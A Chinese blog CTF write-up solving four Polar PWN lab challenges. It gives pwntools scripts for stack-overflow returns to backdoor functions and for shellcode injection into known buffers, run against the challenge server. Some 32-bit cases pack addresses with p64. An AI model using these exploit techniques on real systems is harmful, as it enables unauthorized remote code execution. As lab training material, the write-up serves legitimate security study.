Polar PWN内容WP 三

最新推荐文章于 2024-07-16 12:57:18 发布
最新推荐文章于 2024-07-16 12:57:18 发布
阅读量1.4k 收藏 27
点赞数 20
分类专栏: PWN靶场 文章标签: linux 安全 安全性测试 系统安全 网络安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pythonZLX/article/details/136848234
版权

九、你是大佬还是菜鸡?

老规矩查看一下文件

64位开启nx保护

进入ida查看一下

有两个函数,一个叫dalao,一个叫caiji

输入1进入大佬函数,输入2进入菜鸡函数,先进去大佬函数看一下

淦,被骂了;进入菜鸡函数看一下

一个溢出漏洞,shift+F12查找字符串

有bin/sh

跟踪一下发现一个标准的后门函数

思路:输入2进入菜鸡函数,然后利用溢出跳到后门函数位置

编写

from pwn import *
r =remote("120.46.59.242", 2097)
bin_sh=0x4008B0
padding=0x20+8
r.sendlineafter(b'2. Cai Ji\n',b'2')
payload=b'a'*padding+p64(bin_sh)
r.sendline(payload)
r.interactive()

然后cat flag即可

十、Easy_ShellCode

老规矩查看一下文件

32位没有任何保护

IDA~启动!

main函数中有一个Start函数,直接进入Start函数查看 (main内容不截图了)

有两次写入的地方,shift+F12查看字符串

没有任何bin/sh cat flag的迹象

思路:通过第一次写入向栈中写入shellcode,通过第二次写入造成溢出跳回写入第一次shellcode的位置

第一次写入是str变量,双击str变量找到str开始写入的位置

记录一下 str_addr=0x804A080

然后偏移量 0x68+4

编写脚本

from pwn import *
r =remote("120.46.59.242", 2052)
​
shellcode=asm(shellcraft.sh())
str_addr=0x804A080
padding=0x68+4
r.recvuntil("Please Input:\n")
r.sendline(shellcode)
r.recvuntil("What,s your name ?:\n")
payload=b'a'*padding+p64(str_addr)
r.sendline(payload)
r.interactive()

cat flag即可

十一、小狗汪汪汪

查看一下

32位开启nx保护

ida启动

打开查看main函数后有一个dog函数,直接进入dog函数查看

标准,太标准了 一个完美的溢出。shift+F12查看字符串

艾玛,这也有。跟踪一下

后门函数

思路:利用dog函数中的溢出跳到getshell函数

编写

from pwn import *
r =remote("120.46.59.242", 2078)
​
bin_sh=0x804859B
padding=0x9+4
payload=b'a'*padding+p64(bin_sh)
r.sendline(payload)
r.interactive()

然后cat flag即可

十二、play

查看

ida

main里有一个play函数,直接进入play函数

两次写入,第一次red 第二次gets

溢出漏洞

shift+F12

没有后门函数

思路:同第十题一样,利用第一次red写入后门函数,第二次gets溢出跳转到后门函数中(没有开NX保护)

记录一下第一次写入的buf地址:0x6010A0

记录偏移量:0x30+8

编写脚本

from pwn import *
r =remote("120.46.59.242", 2064)
​
context(arch='amd64',os='linux')
shellcode=asm(shellcraft.sh())
padding=0x30+8
bss_addr=0x6010A0
​
r.recvuntil("I think you must enjoy playing.\n")
r.sendline(shellcode)
payload=b'a'*padding+p64(bss_addr)
r.sendline(payload)
r.interactive()
​

cat flag即可

阿斯顿法国红酒快
关注
  • 20
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Polar PWN内容WP
pythonZLX的博客
03-18 1795
下载文件放入虚拟机中查看一下32位ELF文件,开启栈不可执行保护(NX)放入IDA中看一下映入眼帘的就是一个flag函数,直接看一下flag函数中的内容好嘛!cat flag 思路明确了接着我们进入main函数中出现的yes函数,查看一下yes函数中的内容一个栈溢出,read写入的是100个字节,远远超出定义的58字节利用溢出,返回cat flag思路有了计算偏移地址偏移地址:0x58+4找出flag函数地址差不多了,开搞!​运行脚本后得到flag。
Polar PWN内容WP
pythonZLX的博客
03-17 1303
NX保护机制:将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。Stack保护机制:在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致。我们继续,将程序丢入IDA64中查看一下main函数发现一个叫box的函数,进去看一看。
Polar PWN内容WP
pythonZLX的博客
06-17 350
先去下载文件,然后导入到虚拟机中file和checksec一下可以看到是64位程序,并且同时开启了金丝雀和NX保护我们将程序放进IDA中查看一下源码有一个很明显的后门函数,但是需要一些条件在我们运行程序的时候会问我们是不是喜欢小猫,此时有两个选项其实不管输入哪个都无法触发后门函数,因为输入的内容是在buf变量中,而参与判断的是s2变量。我们发现buf变量定义是32个而read可输入的是40个,所以这里有溢出点buf到s2的距离是0x50-0x30。
PolarCTF 2024夏季个人挑战赛 个人WP
Jay17的博客
06-02 1049
PolarCTF 2024夏季个人挑战赛 个人WP
PolarCTF2023冬季个人挑战赛wp含web、misc、crypto_polar冬季赛(1)
m0_60635637的博客
04-08 734
链子`User::__wakeup()->User::printName()->Surrender::__toString()->FileRobot::__get()->FileRobot::__invoke()->FileRobot::Get_file()`**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,蚁剑,不过我连接的时候,警告返回数据为空?
Polar靶场做题 —— test_format
2301_76262491的博客
10-12 218
PolarD&N_pwn_test_format
2023Polar CTF冬季个人挑战赛部分wp
ZJPC007的博客
12-10 389
第一次参加polarctf的比赛,做的不好,把做出来的题目wp传上来和大家分享做题方法,哪里有错还请大佬指教。题目还能复现的,在平台上就能做。
PyBioMed:一个用于化学物质、蛋白质和DNA及其相互作用的各种分子表示的Python文库
热门推荐
weixin_46266120的博客
04-25 12万+
计算蛋白质描述符——PyProtein PyProtein是用于蛋白质特征计算的工具。PyProtein从氨基酸序列中计算蛋白质和肽的结构和物理化学特征。这些序列衍生的结构和理化特征已被广泛用于开发机器学习模型,用于预测蛋白质结构和功能类别,翻译后修饰,亚细胞位置和特定性质的肽。在 PyProtein 模块中,有两种方法可以计算蛋白质描述符。一种是直接使用相应的方法,另一种是首先构建一个PyProtein类,然后运行他们的方法来获得蛋白质描述符。应该注意的是,输出是字典形式,其键和值分别表示描述符名称和
polar3d_维极坐标图_
09-30
标题中的“polar3d”显然是一种扩展功能,用于在MATLAB中生成维极坐标图。 在描述中提到,这个函数是针对MATLAB原生不支持维极坐标图的问题而特别设计的。这意味着开发者可能通过自定义函数或利用MATLAB的底层...
polarDB for Pgsql
08-26
阿里云的rpm安装包
polardb-jdbc18.zip
10-20
PolarDB支持MySQL、PostgreSQL和Oracle种引擎,具备弹性的存储能力、强大的计算性能以及便捷的管理服务。 1.2 JDBC概述 JDBC是Java语言与数据库交互的一套标准API,由Sun Microsystems公司开发并维护,允许Java...
Polar编码matlab程序
03-26
7. 文件"cccode-8130431-polar_codes_1616722218":这个文件名可能是压缩包中包含的Polar码MATLAB实现的源代码文件,具体的内容可能包括上述的编码、解码算法实现,以及可能的性能测试和示例。 总之,Polar码在...
CODE_matlab_polarcode_code_polar_
10-04
标题中的"CODE_matlab_polarcode_code_polar_"暗示了这是一个关于使用MATLAB实现极化码(Polar Code)的项目。极化码是一种新兴的纠错编码技术,由Erdal Arıkan在2009年提出,主要用于提高信道传输的可靠性。这种...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 405
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
Linux C | 管道open打开方式
I_feige的博客
07-12 347
1.
LINUX:懒汉单例模式线程池
最新发布
W2155的博客
07-16 334
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
Linux中的文件夹作用
qq_36634055的博客
07-16 417
这里放的是系统管理员(超级用户)使用的特殊工具,就像是工具箱里的专业工具,比如ifconfig(网络配置)、fdisk(磁盘分区)等,普通用户一般用不到。:这个目录存放了一些基本的用户命令,就像是工具箱里常用的工具,比如ls(列出文件)、cp(复制文件)等,这些命令对于普通用户和系统管理员都是可用的。:这个目录存放了各种可变数据,包括日志文件、邮件队列、打印队列等,就像是家里放杂物的地方,随着时间的推移,里面的东西会不断变化。:这里放的是可选的软件包,就像是额外的娱乐设施,可以根据需要添加。
Linux 安装 Docker Compose
m0_63004677的博客
07-12 392
Linux 系统安装 Docker Compose
matlab polar3d
07-02
MATLAB中的`polar3d`函数是一个用于绘制维极坐标图的工具。它允许你在二维笛卡尔坐标系上创建维数据点的表示,通常用来展示角度和半径的关系,类似于我们在平面上画圆的极坐标概念,但扩展到维空间。 当你调用`polar3d(theta, r)`时,`theta`是一个向量或矩阵,代表了各个点在维空间中的角度(通常是弧度),而`r`则是对应的半径值。这个函数会生成一系列的线段或点,连接起来形成一个维极坐标图形。 例如,你可以使用`[theta, r] = polarpolar(0:0.1:2*pi, 1+sin(theta*pi/6))`来生成一个从原点出发、沿着维空间中的一系列螺旋线的数据集,然后用`polar3d(theta, r)`显示出来。 如果你有一个具体的维数据集合,可以直接传递给`polar3d`,它会自动根据数据分布绘制相应的极坐标图形。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值